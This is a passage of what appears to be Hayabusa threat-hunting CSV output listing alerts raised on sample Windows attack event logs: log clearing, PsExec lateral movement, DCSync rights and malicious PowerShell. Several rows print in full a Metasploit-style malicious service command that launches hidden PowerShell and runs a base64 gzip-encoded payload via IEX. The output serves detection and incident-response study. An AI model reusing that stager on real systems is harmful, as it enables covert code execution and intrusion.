Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:07:21.937 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:11:15.816 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:11:15.832 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx -2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx -2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx -2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx -2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx -2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx -2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx -2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx -2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx -2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx -2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx -2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx -2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx -2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx -2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx -2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx -2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx -2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx -2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 